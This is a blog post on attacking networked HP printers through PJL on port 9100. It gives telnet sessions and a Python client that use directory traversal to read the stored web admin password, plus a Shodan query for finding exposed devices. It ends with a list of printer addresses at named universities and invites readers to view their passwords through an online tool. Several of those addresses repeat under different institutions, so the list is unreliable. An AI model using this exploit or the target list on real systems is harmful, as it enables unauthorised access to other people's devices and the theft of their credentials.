When you think about cyber-security, the first things that come to mind are probably personal computers or server racks, maybe surveillance cameras in the light of the NSA affair. Printers will most likely not be the first thing you think of. It is important not to neglect them, though.
Basics of PJL
PJL is an acronym for Printer Job Language, a protocol developed by Hewlett-Packard (HP) to provide a simple way for a host, usually a personal computer that has been told to print a document, to talk to the printer. It listens on TCP port 9100 by default, and it is not restricted to HP printers: many other printer models speak it as well. The language provides a set of commands, including file system commands to download files to and upload files from the printing device.
A basic PJL session might look like this:
user@client:~$ telnet 192.168.178.100 9100
Trying 192.168.178.100...
Connected to 192.168.178.100.
Escape character is '^]'.
^[%-12345X@PJL
@PJL INFO ID
@PJL INFO ID
"Brother MFC-7840W:8C5-C17:Ver.L"
@PJL ECHO Hello World
@PJL ECHO Hello World
The INFO command with the parameter ID asks the printer to reply with its model name and version; ECHO has the printer repeat the message that follows it, here Hello World. In both cases the printer's answer starts by repeating the command it is answering, which is why each command shows up twice in the session above. This is not too thrilling yet, until you start playing with the file system commands, which are prefixed with FS. For example, @PJL FSDIRLIST NAME="0:\" ENTRY=0 COUNT=999 replies with a list of the files located on volume 0:\. On most HP printers this exposes some web server related files to curious eyes. What should not be possible is escaping volume 0:\ with a double dot. But this is exactly what you can do, and it is known as a directory traversal attack: 0:\..\ reveals the parent directory of volume 0:\, and 0:\..\..\ is sufficient on most HP printers to reach the root directory of the underlying Unix system.
Open file systems
Open printer file systems allow you to upload files directly to the printer's web directory. Visit http://lks-350-375e-038-d.ls.berkeley.edu/hp/device/pjlexploit/PoC.html for a proof of concept. There is a protection against file system access, namely a 16-bit PJL password which has to be set via the PJL interface, but it is too complicated for standard or even advanced users, who would have to know the PJL specification in order to set it up. Secondly, a 16-bit password has only 65,536 possible values and can be brute-forced within hours.
Plain text passwords
Storing passwords in plain text is a sin you are only allowed to commit as an absolute security beginner. You may not practise it as an embedded systems developer for a company whose printers are shipped worldwide. However, this is exactly what HP's developers have done. Since you have access to a large part of the Unix file system, which only seems to be restricted by native file permissions, you can now download the file 0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat with the PJL command FSUPLOAD (PJL commands are named from the printer's perspective: FSUPLOAD sends a file from the printer to the host, FSDOWNLOAD sends one to the printer). Guess what this file contains. If you read the null-terminated ASCII string starting at offset 0x0c, you will notice that it is the web interface administration password.
The following short PJL session fully exploits this vulnerability. It was a session to 126.96.36.199 at the University of California, Los Angeles, selected as an example because of the highly creative password choice.
^[%-12345X@PJL
@PJL FSUPLOAD NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
password
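To make the two sessions above reproducible without a telnet client, here is a small Python client written for this post (it is added example code, not part of the original article and not the code of PJL Explorer). It frames PJL commands with the UEL sequence, builds the double-dot traversal path from the FSDIRLIST section, parses FSDIRLIST and FSUPLOAD replies, and pulls the null-terminated string at offset 0x0c out of ps_3D_0D.dat. The reply formats follow HP's PJL reference as far as I know it; treat them as an assumption if your printer answers differently. The sample replies at the bottom are constructed, not captured from any printer, and the password in them is made up.

```python
import re
import socket

# Universal Exit Language sequence (ESC %-12345X): switches the printer into PJL mode
UEL = b"\x1b%-12345X"

# Offset of the NUL-terminated admin password inside ps_3D_0D.dat (see the post)
PASSWORD_OFFSET = 0x0C


def pjl_request(*commands):
    """Frame PJL commands for port 9100: UEL, one '@PJL ...' line per command, closing UEL."""
    body = b"".join(b"@PJL " + c.encode("ascii") + b"\r\n" for c in commands)
    return UEL + body + UEL


def traversal_path(depth, volume="0:\\"):
    """Path that climbs `depth` directories above the volume, e.g. depth 2 -> 0:\\..\\..\\"""
    return volume + "..\\" * depth


def fsdirlist_cmd(path, entry=0, count=999):
    return 'FSDIRLIST NAME="%s" ENTRY=%d COUNT=%d' % (path, entry, count)


def fsupload_cmd(path, offset, size):
    return 'FSUPLOAD NAME="%s" OFFSET=%d SIZE=%d' % (path, offset, size)


def parse_dirlist(response):
    """FSDIRLIST reply -> list of (name, kind, size). Entry lines look like
    '<name> TYPE=DIR' or '<name> TYPE=FILE SIZE=<n>'; the echoed header is skipped."""
    entries = []
    for line in response.decode("latin-1").splitlines():
        m = re.match(r"^(\S.*?) TYPE=(DIR|FILE)(?: SIZE=(\d+))?\s*$", line)
        if m:
            entries.append((m.group(1), m.group(2), int(m.group(3)) if m.group(3) else None))
    return entries


def parse_fsupload(response):
    """FSUPLOAD reply -> (name, offset, payload). The printer sends one header line,
    '@PJL FSUPLOAD FORMAT:BINARY NAME="<path>" OFFSET=<n> SIZE=<m>', then <m> raw bytes."""
    header, _, payload = response.partition(b"\r\n")
    m = re.match(rb'@PJL FSUPLOAD FORMAT:BINARY NAME="([^"]*)" OFFSET=(\d+) SIZE=(\d+)', header)
    if not m:
        raise ValueError("not an FSUPLOAD reply: %r" % header[:80])
    size = int(m.group(3))
    if len(payload) < size:
        raise ValueError("short read: got %d of %d bytes" % (len(payload), size))
    return m.group(1).decode("latin-1"), int(m.group(2)), payload[:size]


def cstring_at(data, offset):
    """NUL-terminated ASCII string starting at `offset` (runs to the end if no NUL)."""
    end = data.find(b"\x00", offset)
    if end < 0:
        end = len(data)
    return data[offset:end].decode("ascii", errors="replace")


def admin_password(response):
    """Web admin password from an FSUPLOAD reply for ps_3D_0D.dat, whatever OFFSET
    was requested, as long as the returned chunk covers file offset 0x0c."""
    _, file_offset, payload = parse_fsupload(response)
    if file_offset > PASSWORD_OFFSET:
        raise ValueError("chunk starts past the password offset")
    return cstring_at(payload, PASSWORD_OFFSET - file_offset)


def pjl_exchange(host, command, port=9100, timeout=5.0):
    """Send one PJL command and collect the reply. Printers keep the connection open,
    so reading stops on the receive timeout. Network helper only; nothing below uses it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(pjl_request(command))
        chunks = []
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)


# Constructed sample replies (not captured from a real printer), in the formats above.
SAMPLE_DIRLIST = (
    b'@PJL FSDIRLIST NAME="0:\\..\\..\\" ENTRY=1\r\n'
    b". TYPE=DIR\r\n"
    b".. TYPE=DIR\r\n"
    b"hpmnt TYPE=DIR\r\n"
    b"webServer TYPE=DIR\r\n"
    b"index.htm TYPE=FILE SIZE=2048\r\n"
)
SAMPLE_UPLOAD = (
    b'@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\hpmnt\\dsk_cf0a\\PermStore\\ps_3D_0D.dat" '
    b"OFFSET=12 SIZE=16\r\n"
    b"examplepw\x00\x00\x00\x00\x00\x00\x00"  # made-up password, NUL padded to 16 bytes
)

if __name__ == "__main__":
    print(pjl_request(fsdirlist_cmd(traversal_path(2))))
    for name, kind, size in parse_dirlist(SAMPLE_DIRLIST):
        print(name, kind, size)
    print("admin password:", admin_password(SAMPLE_UPLOAD))
```

Against a real device you would replace the samples with `pjl_exchange(host, fsdirlist_cmd(traversal_path(2)))` and `pjl_exchange(host, fsupload_cmd(path, 12, 16))`; the parsers are deliberately separate from the network code so the reply handling can be checked offline.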
Explore printers yourself
A web-based PJL exploring tool called PJL Explorer has been developed to give easy graphical access to the printer file system. You can access it at http://blechschmidt.saarland/printers/. PJL Explorer allows you to browse the printer file system and to upload and delete files. To find exposed printers, run the following search query using a free Shodan account: port:9100 hp.
The source code of the PJL Explorer is available on Github.
Universities of Harvard, Princeton and Cambridge affected
Harvard: 188.8.131.52, 184.108.40.206, 220.127.116.11
Massachusetts Institute of Technology: 18.104.22.168, 22.214.171.124
Princeton: 126.96.36.199, 188.8.131.52, 184.108.40.206
Cambridge: 220.127.116.11, 18.104.22.168
Stanford University: 22.214.171.124
University of California, Berkeley: 126.96.36.199, 188.8.131.52, 184.108.40.206
University of California, Los Angeles: 220.127.116.11, 18.104.22.168, 22.214.171.124
For legal reasons, passwords are not included in this blog post. To view a printer's password, open one of the above addresses in the PJL Explorer, which will display it.